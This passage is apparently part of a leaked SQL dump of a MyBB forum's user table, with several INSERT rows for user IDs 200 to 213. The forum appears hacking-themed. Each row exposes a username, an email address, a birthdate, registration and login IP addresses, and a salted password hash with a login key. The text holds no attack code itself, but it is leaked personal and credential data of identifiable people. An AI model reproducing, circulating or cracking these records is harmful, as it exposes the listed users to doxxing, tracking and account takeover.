`suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('200', 'Poptart', '55dcd7c6fdac90d03e2e020892d438fc', 'goXreXgt', 'eCgdkHGL82GVo7YDjurKmrId8hNou9cFiQlntW1wzFuemecwtx', 'buggyjackl@gmail.com', '14', '', '', '', '2', '', '0', '', '1348793896', '1348797846', '1348797846', '1348797830', '', '0', '', '', '', '15-11-1992', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-5', '1', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '82', '0', '1', '24.212.197.164', '24.212.197.164', '416597412', '416597412', '', '1401', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '1', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('201', 'Huey', '6037587c4c323d6124092ebd7a016568', 'TNdGOTeg', 'pNgDExRaHYUek98PhqzT3aoVjFGl9zGcQS8WIOP69meFvmNRRB', 'jm0720@live.com', '0', '', '', '', '2', '', '0', '', '1348804805', '1348880165', '1348805352', '0', '', '0', '', '', '', '1-1-1998', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '46.246.31.102', '46.246.31.97', '787881830', '787881825', '', '844', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('202', 'kur0', '90436a0108b5eb7a9c840e8bdcb26129', '3zOFnuww', '53L6VrFZlr1Dyh2bAH7ZDvm8nAuhxxh42Ag292NmbN2E4l9wm5', 'kur_kur02Z@yahoo.com', '0', '', '', '', '2', '', '0', '', '1348810401', '1348812320', '1348810492', '0', '', '0', '', '', '', '31-12-1986', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '180.247.247.206', '180.247.247.206', '-1258817586', '-1258817586', '', '781', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('203', 'NeonLights', 'f5baf1e075d5d66e364c292947e52ee6', 'R4Cjo8LY', 'kvnT9CksTuXkqzcXS1DUOf16PVBH1lB7yjuoZuIEXJthhy5AvF', 'bigfatchode@hotmail.ca', '88', './uploads/avatars/avatar_203.jpg?dateline=1348861691', '96|120', 'upload', '7', '', '0', 'BlackHat Expert', '1348859621', '1351919521', '1350088783', '1349919588', '', '0', '', '', '', '2-4-1997', 'all', '[align=center][img]http://i.imgur.com/2Ytdn.gif[/img][/align]', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '1', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', 'I LIKE WEED!', '0', '2', '14', '67.68.75.99', '173.245.64.81', '1128549219', '-1376436143', '', '106330', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:1:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '27', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('204', 'ml2324', '6e5f79804f453a0dcd1d291c0d64d097', 'uXydqnd9', '6GMfnYIcsl3FdW34tOnop83dUcaQ5HD2BVZselJP55CxelYo9V', 'martinkinglomosad@gmail.com', '0', '', '', '', '2', '', '0', '', '1348891320', '1348892480', '1348891320', '0', '', '0', '', '', '', '20-3-1990', 'all', '', '1', '0', '0', '0', '0', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '122.52.119.1', '122.52.119.1', '2050258689', '2050258689', '', '1160', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('205', 'mothered', '7d2c1acc045cb4f6b479a8d81637fb6b', 'lL5oyBnH', 'rQHBEhXKHtSk1zbXRmw5qHDbCcEIUDict3LT4bnghjJxbqrz8w', 'mothered@live.com.au', '200', './uploads/avatars/avatar_205.png?dateline=1348894234', '80|80', 'upload', '9', '', '0', 'Nevermind how, I will login', '1348894111', '1352810003', '1352717095', '1352809997', '', '0', '', '', '', '30-7-1968', 'all', '[url=http://www.windows8hacker.com/] [img]http://img706.imageshack.us/img706/6481/windows8hacker.png[/img][/url]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '10', '1', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '1', '0', '16', '210.50.40.19', '210.50.40.19', '-768464877', '-768464877', '', '62309', '1', '12', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:4:{s:4:\"acid\";a:15:{i:8;a:5:{s:4:\"acid\";i:8;s:4:\"name\";s:5:\"Angel\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_05_53.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:19;a:5:{s:4:\"acid\";i:19;s:4:\"name\";s:6:\"Genius\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_25_10.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:3;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:4;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:5;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:6;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:7;a:1:{s:11:\"showpostbit\";i:0;}i:9;a:1:{s:11:\"showpostbit\";i:0;}i:10;a:1:{s:11:\"showpostbit\";i:0;}i:11;a:1:{s:11:\"showpostbit\";i:0;}i:12;a:1:{s:11:\"showpostbit\";i:0;}i:13;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:3:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}}s:0:\"\";a:1:{s:0:\"\";a:2:{s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '22', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('206', 'aayush', 'f1ae19d9c685d0328b2387fc9a7f4d41', 'BMVa3EO8', 'LKqlnp1aDDZcHn8cH9Vky488EqZnLkgfqQYAzhJlY7zLKHIMQP', 'aayushkheterpal@gmail.com', '0', '', '', '', '2', '', '0', '', '1348952755', '1352801875', '1352799709', '0', '', '0', '', '', '', '17-3-1996', 'all', '', '1', '1', '2', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '5.5', '0', '2', '62', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '122.176.137.20', '122.176.141.102', '2058389780', '2058390886', '', '2478', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('207', 'Combat', '5a18146f94dbffc864fc4d0dc4ea385f', 'XhFRqfUL', '4qeinT59PhaXo9zhwh9DzDvaRH8fnuWhmURAoKw5y4RfPwHytP', 'tfdavison@hotmail.com', '1', '', '', '', '2', '', '0', '', '1348966717', '1350164261', '1350078051', '1349069555', '', '0', '', '', '', '12-12-1992', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '76.121.85.91', '76.28.177.62', '1283020123', '1276948798', '', '1691', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '1', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('208', 'alinaansari', 'cc9fb4d902bf4d9f1e1ea0506ae9d01c', '8nKShYmC', 'FtHADarUrllTWF18RFBDYpZ239d5qqcq7pNzx6sZz7R87LRTXW', 'cutealinaansari@gmail.com', '0', '', '', '', '2', '', '0', '', '1349012362', '1349012951', '1349012362', '0', '', '0', '', '', '', '2-2-1992', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '203', '0', '0', '182.178.29.232', '182.178.29.232', '-1229840920', '-1229840920', '', '589', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('209', 'Kaveman', 'ccdf516de84f9d8782a596f5a21bf060', 'i1ZpGVtg', 'iEkpzUjAGt5C86stK5HQN6Tzd7LwB7rerHUNeS55aqpNSJRWws', 'geo.kaveman@gmail.com', '0', '', '', '', '2', '', '0', '', '1349019583', '1349019810', '1349019583', '0', '', '0', '', '', '', '13-10-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '94.43.75.187', '94.43.75.187', '1579895739', '1579895739', '', '227', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('210', 'Skymd', 'f9e92614537d40d16c5151d608baee66', 'sEdlAwtU', 'p36rkGHgnMT16HqWT2Cs1FQnwk7soMWeya3i57zHDOHDtgj3HP', 'skymd@live.com', '0', '', '', '', '2', '', '0', '', '1349049238', '1350035464', '1349049381', '0', '', '0', '', '', '', '2-4-1998', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '71.184.126.65', '173.76.159.245', '1203273281', '-1387487243', '', '143', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('211', 'NotJester', 'bcdc41eca28762c62e017933d40a7b30', 'xvFXP8Dm', 'q2XUQLrWZvoGooFelHqu7sGp2OfBfdtgkxaU1QKcoGCcZtugVN', '23lraqa0.2cn@20minutemail.com', '0', '', '', '', '7', '', '0', '', '1349056669', '1349056766', '1349056669', '0', '', '0', '', '', '', '1-4-1983', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '174.127.99.162', '174.127.99.162', '-1367383134', '-1367383134', '', '97', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('212', 'hades10', 'ab482d5c00d61ea777dfcdeb94969c37', 'uezHOgzF', 'A6CBAUNkIapfEw8Ba94mcoj5t63edUM3rdpKiPrgwRFH2vl6AS', 'bvasilis1@hotmail.com', '0', '', '', '', '2', '', '0', '', '1349091170', '1349092204', '1349091170', '1349092204', '', '0', '', '', '', '3-5-1980', 'all', '', '0', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '176.92.96.130', '176.92.96.130', '-1336123262', '-1336123262', '', '1034', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('213', 'BitMonst3r', '1a3d21cb52adb7219eda928d6fba127f', 'o66vMU8z', 'RxAyJQa6S9IVALnXLvASO5eSx5gn3g8bClRqKay5TnavGJ5GKM', 'hfleaks@gmail.com', '9', './uploads/avatars/avatar_213.jpg?dateline=1349617843', '120|140', 'upload', '2', '', '0', '', '1349107448', '1350400184', '1349867900', '1349758717', '', '0', '', '', '', '28-1-1989', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '188.69.227.48', '178.250.34.208', '-1136270544', '-1292229936', '', '3949', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '5', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, 